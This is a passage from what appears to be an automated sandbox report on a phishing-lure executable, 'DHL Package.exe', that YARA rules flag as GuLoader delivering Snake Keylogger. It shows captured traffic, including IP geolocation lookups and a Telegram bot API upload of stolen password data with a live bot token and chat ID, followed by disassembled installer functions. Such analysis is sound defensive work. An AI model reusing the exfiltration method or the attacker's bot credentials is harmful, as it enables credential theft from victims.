Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
2024-08-07 07:28:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49747	172.67.177.134	443	4252	C:\Users\user\Desktop\DHL Package.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-07 07:28:24 UTC	64	OUT	GET /xml/102.129.252.169 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-07 07:28:24 UTC	704	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 5 Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jESVpQbGx5w3AZM%2BErLPR3KuDLE0kI6NY9W5DoYCoA1eXSXeQWSB2CcOqJjz8M5q2gAFxdVTw%2Beq%2B4tVdg3tZOq2BDtT01d3pU0pwafkokhYOwvRjnhC0zUwMhXiB2N%2FehaD9gaY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8af58cbb992df97b-SJC alt-svc: h3=":443"; ma=86400
2024-08-07 07:28:24 UTC	381	IN	Data Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
2024-08-07 07:28:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49748	172.67.177.134	443	4252	C:\Users\user\Desktop\DHL Package.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-07 07:28:25 UTC	64	OUT	GET /xml/102.129.252.169 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-07 07:28:26 UTC	698	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 6 Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RuAq67b4lB7j9xdesfYhBQ6bf99vcHq6e2pPsr64LVgLwLA4n970eyuCfWpcFfqd79pBrhMu9xiXnCaf6%2BAT3DCnVF1rDMW1tz6E17bAjb9ko7wi3NzuH9sHv9dBNs07lITyaiWt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8af58cc25f84aaac-SJC alt-svc: h3=":443"; ma=86400
2024-08-07 07:28:26 UTC	381	IN	Data Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
2024-08-07 07:28:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49749	172.67.177.134	443	4252	C:\Users\user\Desktop\DHL Package.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-07 07:28:26 UTC	64	OUT	GET /xml/102.129.252.169 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-07 07:28:27 UTC	710	IN	HTTP/1.1 200 OK Date: Wed, 07 Aug 2024 07:28:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 8 Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1bW9wqjhPF2%2FQ7beKr%2BYsWWvWj%2FC2C%2BYEi%2BupIOmX%2FXM0bKsU4XTgQNTM91WyrxpyMG2feQoa3DFBKTzD55E%2FWzlnu5rZjGZA31A4UjPKGVbze9VvN3QWjqsOgnLQRT5LKp3OR13"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8af58cc8fb9dfa82-SJC alt-svc: h3=":443"; ma=86400
2024-08-07 07:28:27 UTC	381	IN	Data Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
2024-08-07 07:28:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	49750	149.154.167.220	443	4252	C:\Users\user\Desktop\DHL Package.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-07 07:28:33 UTC	352	OUT	POST /bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=6873631044&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcb6910375831a Host: api.telegram.org Content-Length: 582 Connection: Keep-Alive
2024-08-07 07:28:33 UTC	582	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 36 39 31 30 33 37 35 38 33 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 41 72 74 68 75 72 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 37 31 33 34 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 37 2f 30 38 2f 32 30 32 34 20 2f 20 30 33 3a 32 38 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8dcb6910375831aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:971342Date and Time: 07/08/2024 / 03:28:16Client IP:
2024-08-07 07:28:34 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 07 Aug 2024 07:28:34 GMT Content-Type: application/json Content-Length: 500 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-08-07 07:28:34 UTC	500	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 39 37 39 35 30 31 35 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 7a 65 72 69 62 65 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4e 7a 65 72 69 62 65 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 37 33 36 33 31 30 34 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 6e 61 6b 69 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 6b 61 6e 61 6b 69 5f 32 30 32 34 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 33 30 31 35 37 31 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d Data Ascii: {"ok":true,"result":{"message_id":27,"from":{"id":7197950156,"is_bot":true,"first_name":"Nzeribe1","username":"Nzeribe1bot"},"chat":{"id":6873631044,"first_name":"Manaki","username":"Makanaki_2024","type":"private"},"date":1723015714,"document":{"file_nam

Target ID:	0
Start time:	03:26:23
Start date:	07/08/2024
Path:	C:\Users\user\Desktop\DHL Package.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL Package.exe"
Imagebase:	0x400000
File size:	352'704 bytes
MD5 hash:	CEB0FC229F47B61909CE0E6A68DD191F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2283851326.000000000616D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:28:02
Start date:	07/08/2024
Path:	C:\Users\user\Desktop\DHL Package.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL Package.exe"
Imagebase:	0x400000
File size:	352'704 bytes
MD5 hash:	CEB0FC229F47B61909CE0E6A68DD191F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.6270895609.0000000037035000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.6270895609.000000003710E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.6270895609.0000000036EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	19.9%
Dynamic/Decrypted Code Coverage:	13.4%
Signature Coverage:	16.1%
Total number of Nodes:	1599
Total number of Limit Nodes:	40

Executed Functions

Function 0040348F Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004034B2
GetVersion.KERNEL32 ref: 004034B8
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034EB
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403528
OleInitialize.OLE32(00000000), ref: 0040352F
SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 0040354B
GetCommandLineW.KERNEL32(00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 00403560
CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL Package.exe",00000020,"C:\Users\user\Desktop\DHL Package.exe",00000000,?,00000007,00000009,0000000B), ref: 00403598

Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD

GetTempPathW.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036D2
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036E3
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004036EF
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403703
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040370B
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371C
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403724
DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403738

Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8

OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403803
ExitProcess.KERNEL32 ref: 00403824
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403837
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403846
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403851
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL Package.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040385D
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403879
DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 004038D3
CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL Package.exe,00420EC8,00000001,?,00000007,00000009,0000000B), ref: 004038E7
CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000,?,00000007,00000009,0000000B), ref: 00403914
GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403943
OpenProcessToken.ADVAPI32(00000000), ref: 0040394A
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395F
AdjustTokenPrivileges.ADVAPI32 ref: 00403982
ExitWindowsEx.USER32(00000002,80040002), ref: 004039A7
ExitProcess.KERNEL32 ref: 004039CA

Strings

TMP, xrefs: 0040371F
UXTHEME, xrefs: 004034DF, 004034E4, 004034EA
Error launching installer, xrefs: 004037BA
NSIS Error, xrefs: 00403551
.tmp, xrefs: 0040384B
1033, xrefs: 00403733
C:\Users\user\Desktop\DHL Package.exe, xrefs: 004038E2
SeShutdownPrivilege, xrefs: 00403959
~nsu, xrefs: 0040382F
C:\Users\user\Desktop, xrefs: 00403856, 0040385B, 00403888
C:\Users\user\AppData\Local\peggle\Dilettantkomediers, xrefs: 004037E0
C:\Users\user\AppData\Local\peggle, xrefs: 004036B5, 004037D5, 0040387F, 00403889
Low, xrefs: 00403705
\Temp, xrefs: 004036E9
"C:\Users\user\Desktop\DHL Package.exe", xrefs: 00403566, 0040356C, 00403760
TEMP, xrefs: 00403717
C:\Users\user\AppData\Local\Temp\, xrefs: 004036C7, 004036CC, 004036E2, 004036EE, 004036FD, 0040370A, 00403716, 0040371E, 00403834, 00403845, 00403850, 0040385C, 00403869, 00403878, 00403929

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\DHL Package.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\peggle$C:\Users\user\AppData\Local\peggle\Dilettantkomediers$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL Package.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-557215561
Opcode ID: 45b82c846e153b5322f76d200fb5aca8c4b541a6c4aaf17c248ce3d8fb595d41
Instruction ID: 80ab2d28ddbf02fe5cd82fe477cea5b095f50d567d4594062ccc97c7db5cb5a9
Opcode Fuzzy Hash: 45b82c846e153b5322f76d200fb5aca8c4b541a6c4aaf17c248ce3d8fb595d41
Instruction Fuzzy Hash: 32D107B0204310ABD7207F659E45A3B3AACEB4470AF11447FF481F62E1DBBD8956876E

Function 00405582 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004055E0
GetDlgItem.USER32(?,000003EE), ref: 004055EF
GetClientRect.USER32(?,?), ref: 0040562C
GetSystemMetrics.USER32(00000002), ref: 00405633
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405654
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405665
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405678
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405686
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405699
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056BB
ShowWindow.USER32(?,00000008), ref: 004056CF
GetDlgItem.USER32(?,000003EC), ref: 004056F0
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405700
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405719
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405725
GetDlgItem.USER32(?,000003F8), ref: 004055FE

Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374

GetDlgItem.USER32(?,000003EC), ref: 00405742
CreateThread.KERNELBASE(00000000,00000000,Function_00005516,00000000), ref: 00405750
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405757
ShowWindow.USER32(00000000), ref: 0040577B
ShowWindow.USER32(?,00000008), ref: 00405780
ShowWindow.USER32(00000008), ref: 004057CA
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057FE
CreatePopupMenu.USER32 ref: 0040580F
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405823
GetWindowRect.USER32(?,?), ref: 00405843
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040585C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405894
OpenClipboard.USER32(00000000), ref: 004058A4
EmptyClipboard.USER32 ref: 004058AA
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058B6
GlobalLock.KERNEL32(00000000), ref: 004058C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058D4
GlobalUnlock.KERNEL32(00000000), ref: 004058F4
SetClipboardData.USER32(0000000D,00000000), ref: 004058FF
CloseClipboard.USER32 ref: 00405905

Strings

{, xrefs: 004057E8

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: {
API String ID: 4154960007-366298937
Opcode ID: d2ff847ff4ec71b1cce3c4311f9d311e65ace06014fcbcb193fe2448cc8158ae
Instruction ID: 548bfd7703c7e8b67cc6bd423be8dd859740628245fa72e8840ee51ebf386eb0
Opcode Fuzzy Hash: d2ff847ff4ec71b1cce3c4311f9d311e65ace06014fcbcb193fe2448cc8158ae
Instruction Fuzzy Hash: D0B159B0900609FFDB11AF61DD89AAE7B79FB44354F00803AFA45B61A0C7754E51DF68

Function 00405AED Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,77163420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B16
lstrcatW.KERNEL32(00425710,\*.*), ref: 00405B5E
lstrcatW.KERNEL32(?,0040A014), ref: 00405B81
lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,77163420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B87
FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,77163420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B97
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C37
FindClose.KERNEL32(00000000), ref: 00405C46

Strings

\*.*, xrefs: 00405B58
"C:\Users\user\Desktop\DHL Package.exe", xrefs: 00405AED
C:\Users\user\AppData\Local\Temp\, xrefs: 00405AFA

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\DHL Package.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3275289347
Opcode ID: 9036ba2aa722766dc29abb0410fb58961029e1c042b72e4e8ea17b50247261c3
Instruction ID: 6d977be599016ad98dbda8fdbba8a7eaa4df1add9cdfb0a4bac278b573c77b22
Opcode Fuzzy Hash: 9036ba2aa722766dc29abb0410fb58961029e1c042b72e4e8ea17b50247261c3
Instruction Fuzzy Hash: 1A41D530904A18AAEB216B65DC8AABF7678EF41718F10413FF801B11D1D77C5AC1DEAE

Function 00406AFA Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
